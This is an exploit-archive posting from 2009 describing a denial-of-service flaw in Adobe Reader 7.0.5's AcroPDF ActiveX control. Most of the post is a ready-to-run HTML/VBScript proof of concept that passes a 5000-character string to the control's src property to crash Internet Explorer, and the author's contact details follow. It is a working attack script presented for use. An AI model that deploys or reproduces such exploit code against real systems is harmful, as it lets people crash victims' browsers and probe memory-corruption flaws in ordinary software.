Home / exploits

PDF

acropdf-dos.txt

Posted on 18 November 2009

Adobe browser document ActiveX DoS vulnerablity

File:  AcroPDF.dll

Affected version : 7.0.5 . Later versions are also effected

Description:

RegKey Safe for Script: True
RegKey Safe for Init: True

POC:
Create a HTML file with following Code and test it on IE

<html>
Test Exploit page
<object classid='clsid:CA8A9780-280D-
11CF-A24D-444553540000' id='target' ></object>
<script language='vbscript'>
targetFile = "C:Program FilesAdobeAcrobat 7.0ActiveXAcroPDF.dll"
prototype  = "Property Let src As String"
memberName = "src"
progid     = "AcroPDFLib.AcroPDF"
argCount   = 1

arg1=String(5000, "A")

target.src = arg1

</script>


--
Beenu Arora
M.C.S.E. , C|EH
+91-9911254288
www.BeenuArora.com

 

TOP